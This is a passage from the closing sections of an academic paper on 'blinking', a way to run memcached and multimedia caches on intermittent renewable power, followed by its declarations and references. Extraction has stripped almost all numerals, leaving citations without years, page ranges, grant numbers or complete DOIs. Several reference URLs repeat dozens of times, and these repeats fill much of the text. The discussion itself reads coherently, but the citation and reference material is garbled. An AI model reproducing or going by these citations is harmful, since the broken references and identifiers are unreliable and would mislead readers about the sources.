aggregate demand, they are also useful for flexible routing of a variable power supply. prior research on workload-driven approaches to improve data center energy efficiency is orthogonal to our work. examples include designing platforms that balance cpu and i/o capacity (anderson et al., ; rivoire et al., ), routing requests to locations with the cheapest energy (qureshi et al., ), and dynamically activating and deactivating nodes as demand rises and falls (chase et al., ; tolia et al., ; krioukov et al., ). powernap’s node-level energy proportional technique has also been viewed as a workload-driven optimization (meisner, gold & wenisch, ). we show that a similar technique is useful for controlling per-node power consumption in a power-driven system. power capping has also been studied previously in data centers to ensure collections of nodes do not exceed a worst-case power budget (ranganathan et al., ; fan, weber & barroso, b). however, the work assumes exceeding the power budget is a rare transient event that does not warrant application-specific modifications, and that traditional sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. power management techniques, e.g., dvfs, are capable of enforcing the budget. these assumptions may not hold in many scenarios with intermittent power constraints, as with our renewable energy power source. gandhi et al. ( ) cap cpu power by forcing cpu idle periods. while similar, blinking focuses on capping per-node power where the cpu is only one component of the total power draw. improving the energy-efficiency of storage is also a related research area. while memcached does not offer persistent storage, our modifications for blinking adapt similar ideas from prior storage research, such as migrating popular objects to more active nodes (pinheiro & bianchini, ; zhu et al., a). additionally, power-aware caching algorithms focus on maximizing the idle time between disk accesses to reduce disk power consumption, while our work focus on controlling the power consumption of the cache itself (zhu et al., b). blinking introduces regulated churn into data center applications as nodes switch from the active to inactive state. churn has been well-studied in decentralized, self-organizing distributed hash tables (stoica et al., ). however, the type of churn experienced by dhts is different than the churn caused by blinking, which motivates our different approach to the problem. in the former case, nodes arrive and depart unexpectedly based on autonomous user behavior and network conditions, while in the latter case, nodes switch between the active and inactive states in a regular and controllable fashion. ramcloud (ousterhout et al., ) proposes using memory for low-latency persistent storage, and cites as motivation the increasingly large memcached clusters used in production data centers. the use of caches to improve the performance of multimedia distribution systems has been studied extensively in the past two decades. tang, xu & chanson ( ) gives a general overview on existing multimedia caching techniques. due to the vast amount of exiting work in this area, we only focus on the work closely related to our approach, although, to the best of our knowledge, there is no existing work that directly addresses multimedia caches for intermittent power. wu, yu & wolf ( ) were among the first to propose the caching of chunks (segments) of a video. in contrast to our approach chunks are not equal in size and increase exponentially with the distance from the start of the video. the intention of this approach is to combine the number of consecutive chunks that are cached with the popularity of the video. e.g., for a very popular video all chunks would be stored on the cache while for less popular chunks only a certain number of the initial chunks of the video would be cached. letting the chunk size grow exponentially has the advantage that the initial chunks of many videos can be stored without occupying too much of the caches storage space. having only one or several initial chunks of a video stored on the cache bears the advantage that a requested video can be streamed to the client and played out without significant delay. missing chunks can be streamed from the server immediately after the initial client request to allow for a smooth play out. in contrast to the approach presented by wu et al., we decided for a scheme that splits all videos in equal sized chunks (except for the very last chunk) where the complete chunk can be transmitted to the client in a period that is equal or smaller than the blink interval, assuming a minimum transmission rate. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. a more restrictive version of the caching of video chunks is the caching of the first chunk (prefix) only, which was introduced by sen, rexford & towsley ( ). the sole goal of this approach is to reduce the buffer time at the client, since the first chunk can be streamed from the cache much faster than from a remote server. our initial work on prefix prefetching of videos listed on youtube’s related video list (khemmarart et al., ) is based on this approach, but proactively prefetches prefixes instead of caching them. as we have shown in khemmarart et al. ( ), prefix prefetching can significantly improve the viewer’s experience of watching videos and this motivated us to investigate how the prefetching approach performs on a multimedia cache for intermittent power. the results presented above show that prefix prefetching can improve the experience of a viewer also in the case of a blinking multimedia cache. as in our current work, trace-based driven simulations are also used in cha et al. ( ) and zink et al. ( ) to investigate the effectiveness of caching for youtube videos. both investigations show that caching of youtube video can both, on a global and regional level, reduce server and network load significantly. in contrast to the work presented in this paper, both studies do not consider scenarios in which power for the caches is intermittent. applicability of blinking while we apply blinking to two distributed applications in this paper, we believe blinking is applicable to other applications with intermittent power constraints. there are a range of scenarios beyond renewable energy where imposing intermittent constraints may be attractive. for example, data centers may wish to participate in automated demand-response programs with the electric grid. automated demand-response, which is a cornerstone of a future smart electric grid, decreases power levels at participating consumers when the electric grid is under stress in exchange for lower power rates. data centers are well-positioned to benefit from automated demand-response, since servers, as opposed to other types of electrical appliances, already include sophisticated power management mechanisms and are remotely programmable. blink simply uses these pre-existing mechanisms to gracefully scale application performance as power varies. additionally, data centers consume significant quantities of power, and demand-response programs typically target large power consumers first. thus, addressing intermittent constraints in data centers may contribute to a more flexible and efficient electric grid. in addition to automated demand-response programs, data center operators may wish to cap energy bills or power consumption at a fixed level for a variety of reasons, which also imposes intermittent power constraints. for instance, capping energy bills imposes variable power constraints when energy prices vary, as with wholesale energy prices which vary at intervals as low as every min (qureshi et al., ). thus, as market prices vary, the amount of power a fixed budget purchases will also vary. capping power is also necessary during “brownout” scenarios, more common in developing countries, where the electric grid is not always able to fully meet demand. further, ranganathan et al. ( ), as well as others (fan, weber & barroso, b), point out the benefits of oversubscribing a data sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. center’s power delivery infrastructure, including the possibility of using dense clusters of lower-cost, but higher-power, components and then capping power to prevent damage. finally, we believe blinking is applicable to applications beyond memcached and multimedia cache. as with caches, applying blinking will likely require application-level modifications to handle regular and periodic disconnections. one particularly interesting case is leveraging blinking to run distributed storage systems under intermittent power constraints, such as in “brownout” scenarios. persistent storage presents a different problem than caches, since there is not an alternative always-on option to fallback on to retrieve data. while we measure the performance of distributed caches primarily as a function of hit rate, a blinking storage system’s performance is primarily a measure of data availability, including both the latency and throughput to access data. as a result, a blinking storage system may need to judiciously replicate data to increase availability and ensure consistency across replicas, despite regular and frequent node transitions between the active and inactive states. conclusion in this paper, we focus on managing server clusters running on intermittent power. we propose blinking as the primary abstraction for handling intermittent power constraints, and define multiple types of blinking policies. we then design an application-independent platform for developing and evaluating blinking applications, and use it to perform an in-depth study of the effects of blinking on two distributed applications—memcached and multimedia cache—for various power signals. we find that while an activation policy with key migration results in the best hit rates, it does not distribute the benefits of the cache equally among equally popular objects. as in-memory caches continue grow in size, they will store a greater fraction of equally popular objects for zipf-like object popularity distributions. we propose and evaluate an asymmetric load-proportional policy to increase fairness without significantly sacrificing the cache’s hit rate. we then propose a staggered load-proportional policy that staggers the start time of servers to maximize the availability of at least one active server. staggering the start time in conjunction with first chunk replication improves the performance of a multimedia cache, but it does not improve that of memcached because it is a key-value storage system and, unlike the multimedia cache, it does not stream data. we are currently studying how blinking applies to other types of data center applications, including distributed storage layers and data-intensive batch systems. additional information and declarations funding this research was supported in part by nsf grants cns- , cns- , eec- , cns- , and cns- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: nsf: cns- , cns- , eec- , cns- , cns- . competing interests prashant shenoy is an academic editor for peerj computer science. dilip krishnappa is an employee of akamai technologies. author contributions • navin sharma conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • dilip krishnappa and sean barker conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • david irwin and prashant shenoy conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the research in this article did not generate any raw data. references agarwal y, hodges s, chandra r, scott j, bahl p, gupta r. . somniloquy: augmenting network interfaces to reduce pc energy usage. in: proceedings of the conference on networked systems design and implementation. berkeley: usenix, – . ahmad f, vijaykumar t. . joint optimization of idle and cooling power in data centers while maintaining response time. in: proceedings of the conference on architectural support for programming languages and operating systems. new york: acm, – . anderson d, franklin j, kaminsky m, phanishayee a, tan l, vasudevan v. . fawn: a fast array of wimpy nodes. in: proceedings of the symposium on operating systems principles. new york: acm, – . balshe w. . power system considerations for cell tower applications. available at http://www. cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf. barroso l, hölzle u. . the case for energy-proportional computing. computer ( ): – doi . /mc. . . breslau l, cao p, fan l, phillips g, shenker s. . web caching and zipf-like distributions: evidence and implications. in: proceedings of the international conference on computer communications. piscataway: ieee, – . cha m, kwak h, rodriguez p, ahn y, moon s. . i tube, you tube, everybody tubes: analyzing the world’s largest user generated content video system. in: imc . new york: acm, – . available at http://an.kaist.ac.kr/traces/papers/imc -cha.pdf. chase j, anderson d, thakar p, vahdat a, doyle r. . managing energy and server resources in hosting centres. in: proceedings of the symposium on operating systems principles. new york: acm, – . sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://dx.doi.org/ . /mc. . http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://dx.doi.org/ . /peerj-cs. cohen i, chase j, goldszmidt m, kelly t, symons j. . correlating instrumentation data to system states: a building block for automated diagnosis and control. in: proceedings of the symposium on operating system design and implementation. berkeley: usenix, – . decandia g, hastorun d, jampani m, kakulapati g, lakshman a, pilchin a, sivasubrama- nian s, vosshall p, vogels w. . dynamo: amazon’s highly available key-value store. in: proceedings of the symposium on operating systems principles. new york: acm, – . elevate energy. . dynamic pricing and smart grid. available at http://www.cntenergy.org/ pricing. endace. . endace dag network monitoring interface. available at http://www.endace.com/. erman j, gerber a, ramadrishnan kk, sen s, spatscheck o. . over the top video: the gorilla in cellular networks. in: proceedings of the acm sigcomm conference on internet measurement conference, imc ’ . new york: acm, – . fan x, weber w, barroso l. a. power provisioning for a warehouse-sized computer. in: proceedings of the acm international symposium on computer architecture. new york: acm. fan x, weber w, barroso l. b. power provisioning for a warehouse-sized computer. in: proceedings of the acm international symposium on computer architecture. new york, piscataway: acm, ieee, – . fan k, zheng z, sinha p. . steady and fair rate allocation for rechargeable sensors in perpetual sensor networks. in: proceedings of the conference on embedded networked sensor systems. new york: acm, – . gandhi a, harchol-balter m, das r, kephart j, lefurgy c. . power capping via forced idleness. in: proceedings of the workshop on energy-efficient design. new york: acm. guay j. . india: forget the grid, community power is here. available at http://ourworld.unu. edu/en/india-forget-the-grid-community-power-is-here/. gupta p. . google to use wind energy to power data centers. reuteurs. available at http:// www.reuters.com/article/us-google-windpower-idustre j bl . hamilton j. . overall data center costs. available at http://perspectives.mvdirona.com/. khemmarart s, zhou r, gao l, zink m. . watching user generated videos with prefetching. in: mmsys. new york: acm, – . kontorinis v, zhang l, aksanli b, sampson j, homayoun h, pettis e, tullsen d, rosing t. . managing distributed ups energy for effective power capping in data centers. in: international symposium on computer architecture (isca). new york: acm, – . krioukov a, mohan p, alspaugh s, keys l, culler d, katz r. . napsac: design and implementation of a power-proportional web cluster. in: proceedings of the workshop on green networking. new york: acm. lee k, bilgir o, bianchini r, martonosi m, nguyen t. . managing the cost, energy consumption, and carbon footprint of internet services. in: proceedings of the sigmetrics conference. new york: acm. le sueur e, heiser g. . dynamic voltage and frequency scaling: the laws of diminishing returns. in: proceedings of the workshop on power aware computing and systems. berkeley: usenix. meisner d, gold b, wenisch t. . powernap: eliminating server idle power. in: proceedings of the conference on architectural support for programming languages and operating systems. new york: acm, – . sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.cntenergy.org/pricing http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://www.endace.com/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://ourworld.unu.edu/en/india-forget-the-grid-community-power-is-here/ http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl 